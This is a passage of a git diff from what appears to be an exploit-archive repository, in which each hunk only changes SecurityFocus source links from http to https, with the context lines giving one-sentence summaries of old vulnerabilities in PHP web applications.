to multiple file disclosure vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/24613.txt b/exploits/php/webapps/24613.txt index 2a685538a..682fa406b 100644 --- a/exploits/php/webapps/24613.txt +++ b/exploits/php/webapps/24613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11219/info +source: https://www.securityfocus.com/bid/11219/info It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. diff --git a/exploits/php/webapps/24614.txt b/exploits/php/webapps/24614.txt index 119d8d02e..d13fa926a 100644 --- a/exploits/php/webapps/24614.txt +++ b/exploits/php/webapps/24614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11220/info +source: https://www.securityfocus.com/bid/11220/info Mambo open source is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly validate user-supplied URI parameters. diff --git a/exploits/php/webapps/24615.txt b/exploits/php/webapps/24615.txt index d8e2aeb83..c1e27427c 100644 --- a/exploits/php/webapps/24615.txt +++ b/exploits/php/webapps/24615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11220/info +source: https://www.securityfocus.com/bid/11220/info Mambo open source is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly validate user-supplied URI parameters. diff --git a/exploits/php/webapps/24616.txt b/exploits/php/webapps/24616.txt index 373b1bcca..3de939ad0 100644 --- a/exploits/php/webapps/24616.txt +++ b/exploits/php/webapps/24616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11221/info +source: https://www.securityfocus.com/bid/11221/info Tutos is reported prone to multiple remote input-validation vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and SQL-injection attacks. diff --git a/exploits/php/webapps/24617.txt b/exploits/php/webapps/24617.txt index 7c37da1ba..d49471cad 100644 --- a/exploits/php/webapps/24617.txt +++ b/exploits/php/webapps/24617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11221/info +source: https://www.securityfocus.com/bid/11221/info Tutos is reported prone to multiple remote input-validation vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and SQL-injection attacks. diff --git a/exploits/php/webapps/24638.txt b/exploits/php/webapps/24638.txt index 9a80bcc90..b4762e968 100644 --- a/exploits/php/webapps/24638.txt +++ b/exploits/php/webapps/24638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11260/info +source: https://www.securityfocus.com/bid/11260/info A vulnerability is reported to exist in the @lexPHPTeam @lex Guestbook software that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. The issue exists due to improper validation of user-supplied data. diff --git a/exploits/php/webapps/24641.txt b/exploits/php/webapps/24641.txt index a2f9e1d87..fde8c9042 100644 --- a/exploits/php/webapps/24641.txt +++ b/exploits/php/webapps/24641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24642.txt b/exploits/php/webapps/24642.txt index d7b729763..8bd58833e 100644 --- a/exploits/php/webapps/24642.txt +++ b/exploits/php/webapps/24642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24643.txt b/exploits/php/webapps/24643.txt index ea82fda13..92b9d67d5 100644 --- a/exploits/php/webapps/24643.txt +++ b/exploits/php/webapps/24643.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24644.txt b/exploits/php/webapps/24644.txt index 19a173cd0..07f6e1f89 100644 --- a/exploits/php/webapps/24644.txt +++ b/exploits/php/webapps/24644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24645.txt b/exploits/php/webapps/24645.txt index b6e53a571..315f1f02b 100644 --- a/exploits/php/webapps/24645.txt +++ b/exploits/php/webapps/24645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24646.txt b/exploits/php/webapps/24646.txt index c2cce6acf..7221d2801 100644 --- a/exploits/php/webapps/24646.txt +++ b/exploits/php/webapps/24646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24647.txt b/exploits/php/webapps/24647.txt index 38c95161a..f8251c5f7 100644 --- a/exploits/php/webapps/24647.txt +++ b/exploits/php/webapps/24647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11272/info +source: https://www.securityfocus.com/bid/11272/info It is reported that ParaChat is susceptible to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input data. diff --git a/exploits/php/webapps/24648.txt b/exploits/php/webapps/24648.txt index 37cd2b10b..e13bbb521 100644 --- a/exploits/php/webapps/24648.txt +++ b/exploits/php/webapps/24648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24649.txt b/exploits/php/webapps/24649.txt index 34e13448f..d1084ff75 100644 --- a/exploits/php/webapps/24649.txt +++ b/exploits/php/webapps/24649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24650.txt b/exploits/php/webapps/24650.txt index 384815a97..5187654a4 100644 --- a/exploits/php/webapps/24650.txt +++ b/exploits/php/webapps/24650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24651.txt b/exploits/php/webapps/24651.txt index 000132730..6dd33d2d9 100644 --- a/exploits/php/webapps/24651.txt +++ b/exploits/php/webapps/24651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24652.txt b/exploits/php/webapps/24652.txt index 21e47279b..a66a5df3d 100644 --- a/exploits/php/webapps/24652.txt +++ b/exploits/php/webapps/24652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24655.txt b/exploits/php/webapps/24655.txt index 9fbde2e6f..5be04d236 100644 --- a/exploits/php/webapps/24655.txt +++ b/exploits/php/webapps/24655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11329/info +source: https://www.securityfocus.com/bid/11329/info PHPLinks is reported prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/24657.txt b/exploits/php/webapps/24657.txt index b2ccd7cff..ffd712b57 100644 --- a/exploits/php/webapps/24657.txt +++ b/exploits/php/webapps/24657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11336/info +source: https://www.securityfocus.com/bid/11336/info BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer. diff --git a/exploits/php/webapps/24659.txt b/exploits/php/webapps/24659.txt index f398e078d..da0232eb7 100644 --- a/exploits/php/webapps/24659.txt +++ b/exploits/php/webapps/24659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. diff --git a/exploits/php/webapps/24660.txt b/exploits/php/webapps/24660.txt index 913f53797..3d99cf20e 100644 --- a/exploits/php/webapps/24660.txt +++ b/exploits/php/webapps/24660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. diff --git a/exploits/php/webapps/24661.txt b/exploits/php/webapps/24661.txt index 60146207a..5975e9dc0 100644 --- a/exploits/php/webapps/24661.txt +++ b/exploits/php/webapps/24661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. diff --git a/exploits/php/webapps/24662.txt b/exploits/php/webapps/24662.txt index ff76a392f..c6143d4c6 100644 --- a/exploits/php/webapps/24662.txt +++ b/exploits/php/webapps/24662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. diff --git a/exploits/php/webapps/24663.txt b/exploits/php/webapps/24663.txt index bad9abced..c0dee301e 100644 --- a/exploits/php/webapps/24663.txt +++ b/exploits/php/webapps/24663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. diff --git a/exploits/php/webapps/24664.txt b/exploits/php/webapps/24664.txt index e3d8bb9cd..153dea708 100644 --- a/exploits/php/webapps/24664.txt +++ b/exploits/php/webapps/24664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11339/info +source: https://www.securityfocus.com/bid/11339/info DCP-Portal is reported prone to multiple HTML injection vulnerabilities. It is reported that DCP-Portal does not sufficiently filter data submitted via input fields in several scripts. diff --git a/exploits/php/webapps/24665.txt b/exploits/php/webapps/24665.txt index 6f2abe375..ad26d6f27 100644 --- a/exploits/php/webapps/24665.txt +++ b/exploits/php/webapps/24665.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11340/info +source: https://www.securityfocus.com/bid/11340/info DCP-Portal is reported prone to a HTTP response splitting vulnerability. The issue presents itself due to a flaw in the affected script that allows an attacker to manipulate how GET requests are handled. diff --git a/exploits/php/webapps/24667.txt b/exploits/php/webapps/24667.txt index d5766232a..6bc76c747 100644 --- a/exploits/php/webapps/24667.txt +++ b/exploits/php/webapps/24667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11348/info +source: https://www.securityfocus.com/bid/11348/info Wordpress is reported prone to a HTTP response splitting vulnerability. The issue presents itself due to a flaw in the affected script that allows an attacker to manipulate how GET requests are handled. diff --git a/exploits/php/webapps/24676.txt b/exploits/php/webapps/24676.txt index bee2d16f4..8cf17cdb5 100644 --- a/exploits/php/webapps/24676.txt +++ b/exploits/php/webapps/24676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11392/info +source: https://www.securityfocus.com/bid/11392/info Campus Pipeline is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24683.txt b/exploits/php/webapps/24683.txt index 825550f26..2fc2b401b 100644 --- a/exploits/php/webapps/24683.txt +++ b/exploits/php/webapps/24683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11415/info +source: https://www.securityfocus.com/bid/11415/info Pinnacle Systems ShowCenter is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24685.txt b/exploits/php/webapps/24685.txt index de053e5f1..24f03f1bd 100644 --- a/exploits/php/webapps/24685.txt +++ b/exploits/php/webapps/24685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11437/info +source: https://www.securityfocus.com/bid/11437/info Reportedly CoolPHP is affected by multiple remote input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input prior to using it to make critical actions. diff --git a/exploits/php/webapps/24689.sh b/exploits/php/webapps/24689.sh index 1ee13f180..834555141 100755 --- a/exploits/php/webapps/24689.sh +++ b/exploits/php/webapps/24689.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11456/info +source: https://www.securityfocus.com/bid/11456/info It is reported that cPanel is susceptible to an information disclosure vulnerability in its function to enable Front Page extensions. diff --git a/exploits/php/webapps/24692.txt b/exploits/php/webapps/24692.txt index 5e4255440..24ccdea6c 100644 --- a/exploits/php/webapps/24692.txt +++ b/exploits/php/webapps/24692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11463/info +source: https://www.securityfocus.com/bid/11463/info It is reported that Jebuch is susceptible to an HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24697.txt b/exploits/php/webapps/24697.txt index bad5f3174..7f3b84cb7 100644 --- a/exploits/php/webapps/24697.txt +++ b/exploits/php/webapps/24697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11497/info +source: https://www.securityfocus.com/bid/11497/info Serendipity is reported prone to an HTTP response splitting vulnerability. diff --git a/exploits/php/webapps/24698.txt b/exploits/php/webapps/24698.txt index efc475255..d6f97ba87 100644 --- a/exploits/php/webapps/24698.txt +++ b/exploits/php/webapps/24698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11502/info +source: https://www.securityfocus.com/bid/11502/info It is reported that UBBCentral UBB.threads is prone to an SQL injection vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input. diff --git a/exploits/php/webapps/24702.txt b/exploits/php/webapps/24702.txt index 6665cc74d..89a8d721f 100644 --- a/exploits/php/webapps/24702.txt +++ b/exploits/php/webapps/24702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11516/info +source: https://www.securityfocus.com/bid/11516/info MoniWiki is reported prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied URI input before including it in dynamic web page content. diff --git a/exploits/php/webapps/24718.txt b/exploits/php/webapps/24718.txt index 17df2d48a..75191c92c 100644 --- a/exploits/php/webapps/24718.txt +++ b/exploits/php/webapps/24718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11587/info +source: https://www.securityfocus.com/bid/11587/info It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24719.txt b/exploits/php/webapps/24719.txt index 645980e6d..9ec8b03c6 100644 --- a/exploits/php/webapps/24719.txt +++ b/exploits/php/webapps/24719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11587/info +source: https://www.securityfocus.com/bid/11587/info It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24729.txt b/exploits/php/webapps/24729.txt index d6f386145..6ec00fad7 100644 --- a/exploits/php/webapps/24729.txt +++ b/exploits/php/webapps/24729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11651/info +source: https://www.securityfocus.com/bid/11651/info Multiple remote vulnerabilities are reported to exist in WebCalendar. diff --git a/exploits/php/webapps/24731.txt b/exploits/php/webapps/24731.txt index 891791b4b..0d36e35cc 100644 --- a/exploits/php/webapps/24731.txt +++ b/exploits/php/webapps/24731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11654/info +source: https://www.securityfocus.com/bid/11654/info Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks. diff --git a/exploits/php/webapps/24732.txt b/exploits/php/webapps/24732.txt index ecacbe29f..8e80988b8 100644 --- a/exploits/php/webapps/24732.txt +++ b/exploits/php/webapps/24732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11660/info +source: https://www.securityfocus.com/bid/11660/info Reportedly Phorum is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitized user supplied URI input. diff --git a/exploits/php/webapps/24734.txt b/exploits/php/webapps/24734.txt index 010d058a1..a0be6a9a9 100644 --- a/exploits/php/webapps/24734.txt +++ b/exploits/php/webapps/24734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11671/info +source: https://www.securityfocus.com/bid/11671/info Private Message System is reported prone to multiple vulnerabilities that can allow remote attackers to carry out cross-site scripting attacks and disclose arbitrary private messages. diff --git a/exploits/php/webapps/24735.txt b/exploits/php/webapps/24735.txt index cce5c2ce6..fba7ef201 100644 --- a/exploits/php/webapps/24735.txt +++ b/exploits/php/webapps/24735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11671/info +source: https://www.securityfocus.com/bid/11671/info Private Message System is reported prone to multiple vulnerabilities that can allow remote attackers to carry out cross-site scripting attacks and disclose arbitrary private messages. diff --git a/exploits/php/webapps/24736.txt b/exploits/php/webapps/24736.txt index 776b822a2..c3bb33f73 100644 --- a/exploits/php/webapps/24736.txt +++ b/exploits/php/webapps/24736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11673/info +source: https://www.securityfocus.com/bid/11673/info A remote HTTP response splitting vulnerability reportedly affects phpWebSite in its user module. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24737.txt b/exploits/php/webapps/24737.txt index 7cadd09dc..d52cd386d 100644 --- a/exploits/php/webapps/24737.txt +++ b/exploits/php/webapps/24737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11676/info +source: https://www.securityfocus.com/bid/11676/info It is reported that Thefacebook is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24739.txt b/exploits/php/webapps/24739.txt index 3456b321c..d16dfb05d 100644 --- a/exploits/php/webapps/24739.txt +++ b/exploits/php/webapps/24739.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11681/info +source: https://www.securityfocus.com/bid/11681/info PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/24748.txt b/exploits/php/webapps/24748.txt index 80e957d3c..71a1ab89e 100644 --- a/exploits/php/webapps/24748.txt +++ b/exploits/php/webapps/24748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11693/info +source: https://www.securityfocus.com/bid/11693/info Event Calendar is prone to multiple input validation vulnerabilities. These issues include HTML injection and cross-site scripting. The following specific vulnerabilities were reported: diff --git a/exploits/php/webapps/24751.pl b/exploits/php/webapps/24751.pl index 7b7be2447..e219311ea 100755 --- a/exploits/php/webapps/24751.pl +++ b/exploits/php/webapps/24751.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11701/info +source: https://www.securityfocus.com/bid/11701/info A vulnerability is reported to exist in the phpBB Cash_Mod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/24752.txt b/exploits/php/webapps/24752.txt index 6eb16b8ef..aa60d4266 100644 --- a/exploits/php/webapps/24752.txt +++ b/exploits/php/webapps/24752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11703/info +source: https://www.securityfocus.com/bid/11703/info A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query. diff --git a/exploits/php/webapps/24759.txt b/exploits/php/webapps/24759.txt index 0bb14c5c3..18184cc4f 100644 --- a/exploits/php/webapps/24759.txt +++ b/exploits/php/webapps/24759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11719/info +source: https://www.securityfocus.com/bid/11719/info A remote SQL injection vulnerability reportedly affects ipbProArcade. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/24762.txt b/exploits/php/webapps/24762.txt index 7796c952a..fcfbd2d47 100644 --- a/exploits/php/webapps/24762.txt +++ b/exploits/php/webapps/24762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11725/info +source: https://www.securityfocus.com/bid/11725/info It is reported that PHPKIT is susceptible to cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/24766.txt b/exploits/php/webapps/24766.txt index 2fb97c8bb..2534f1c79 100644 --- a/exploits/php/webapps/24766.txt +++ b/exploits/php/webapps/24766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11733/info +source: https://www.securityfocus.com/bid/11733/info NuKed-Klan 'submit URI link' function is reported prone to a HTML injection vulnerability. It is reported that the issue exists due to a lack of sufficient input validation performed on the 'website name' input field of the NuKed-Klan submit URI link form. diff --git a/exploits/php/webapps/24768.txt b/exploits/php/webapps/24768.txt index 025a3e001..2b02d17d3 100644 --- a/exploits/php/webapps/24768.txt +++ b/exploits/php/webapps/24768.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11740/info +source: https://www.securityfocus.com/bid/11740/info SugarCRM is reported prone to multiple vulnerabilites arising from insufficient sanitization of user-supplied input. These issues can a remote attacker to carry out cross-site scripting, HTML injection, SQL injection and directory traversal attacks. diff --git a/exploits/php/webapps/24769.txt b/exploits/php/webapps/24769.txt index 44d1bf1e2..c2c2c26ee 100644 --- a/exploits/php/webapps/24769.txt +++ b/exploits/php/webapps/24769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11740/info +source: https://www.securityfocus.com/bid/11740/info SugarCRM is reported prone to multiple vulnerabilites arising from insufficient sanitization of user-supplied input. These issues can a remote attacker to carry out cross-site scripting, HTML injection, SQL injection and directory traversal attacks. diff --git a/exploits/php/webapps/24771.txt b/exploits/php/webapps/24771.txt index c0c0d3c47..51b5ce5ec 100644 --- a/exploits/php/webapps/24771.txt +++ b/exploits/php/webapps/24771.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11744/info +source: https://www.securityfocus.com/bid/11744/info A vulnerability is reported in the KorWeblog software that may allow a remote user to disclose directory listings. diff --git a/exploits/php/webapps/24772.txt b/exploits/php/webapps/24772.txt index 418468346..ff4c073f3 100644 --- a/exploits/php/webapps/24772.txt +++ b/exploits/php/webapps/24772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11745/info +source: https://www.securityfocus.com/bid/11745/info It is reported that Zwiki is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamic web page content. diff --git a/exploits/php/webapps/24782.txt b/exploits/php/webapps/24782.txt index e7b2dc396..e60dbcfa6 100644 --- a/exploits/php/webapps/24782.txt +++ b/exploits/php/webapps/24782.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11765/info +source: https://www.securityfocus.com/bid/11765/info It is reported that phpCMS is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web pages. diff --git a/exploits/php/webapps/24783.txt b/exploits/php/webapps/24783.txt index b3a4d4782..5ef2b0aa6 100644 --- a/exploits/php/webapps/24783.txt +++ b/exploits/php/webapps/24783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11767/info +source: https://www.securityfocus.com/bid/11767/info pnTresMailer is reported susceptible to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input data. diff --git a/exploits/php/webapps/24796.txt b/exploits/php/webapps/24796.txt index 59297fb9f..2e7682a03 100644 --- a/exploits/php/webapps/24796.txt +++ b/exploits/php/webapps/24796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11795/info +source: https://www.securityfocus.com/bid/11795/info It is reported that Blog Torrent is prone to a remote directory traversal vulnerability. This issue is due to a failure of the server process to properly filter user supplied input. diff --git a/exploits/php/webapps/24797.txt b/exploits/php/webapps/24797.txt index 4c3812bed..05416134e 100644 --- a/exploits/php/webapps/24797.txt +++ b/exploits/php/webapps/24797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11798/info +source: https://www.securityfocus.com/bid/11798/info It is reported that Advanced Guestbook is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24798.txt b/exploits/php/webapps/24798.txt index 64d21d366..cf5b24bb4 100644 --- a/exploits/php/webapps/24798.txt +++ b/exploits/php/webapps/24798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11817/info +source: https://www.securityfocus.com/bid/11817/info paFileDB is prone to an installation path disclosure. If invalid requests are made to certain scripts, the installation path is included in the returned error message. diff --git a/exploits/php/webapps/24803.txt b/exploits/php/webapps/24803.txt index ac644e6f1..3ebd966cf 100644 --- a/exploits/php/webapps/24803.txt +++ b/exploits/php/webapps/24803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11839/info +source: https://www.securityfocus.com/bid/11839/info It is reported that Blog Torrent is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24806.txt b/exploits/php/webapps/24806.txt index f6f03bd46..2de10a28e 100644 --- a/exploits/php/webapps/24806.txt +++ b/exploits/php/webapps/24806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11848/info +source: https://www.securityfocus.com/bid/11848/info It is reported that WebLibs is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly filter user-supplied input. diff --git a/exploits/php/webapps/24810.txt b/exploits/php/webapps/24810.txt index 161262a09..39efae424 100644 --- a/exploits/php/webapps/24810.txt +++ b/exploits/php/webapps/24810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11868/info +source: https://www.securityfocus.com/bid/11868/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24814.txt b/exploits/php/webapps/24814.txt index a3bc25af3..85a1a838a 100644 --- a/exploits/php/webapps/24814.txt +++ b/exploits/php/webapps/24814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11880/info +source: https://www.securityfocus.com/bid/11880/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24816.txt b/exploits/php/webapps/24816.txt index 760f58092..21ca3caee 100644 --- a/exploits/php/webapps/24816.txt +++ b/exploits/php/webapps/24816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11882/info +source: https://www.securityfocus.com/bid/11882/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24817.txt b/exploits/php/webapps/24817.txt index edbac9cdc..70f17375e 100644 --- a/exploits/php/webapps/24817.txt +++ b/exploits/php/webapps/24817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11886/info +source: https://www.securityfocus.com/bid/11886/info phpMyAdmin is reported prone to multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These issues result from insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/24819.txt b/exploits/php/webapps/24819.txt index 532fe8b3f..d92c00511 100644 --- a/exploits/php/webapps/24819.txt +++ b/exploits/php/webapps/24819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11888/info +source: https://www.securityfocus.com/bid/11888/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24820.txt b/exploits/php/webapps/24820.txt index ff868bbc9..cd3f6d130 100644 --- a/exploits/php/webapps/24820.txt +++ b/exploits/php/webapps/24820.txt @@ -1,4 +1,4 @@ 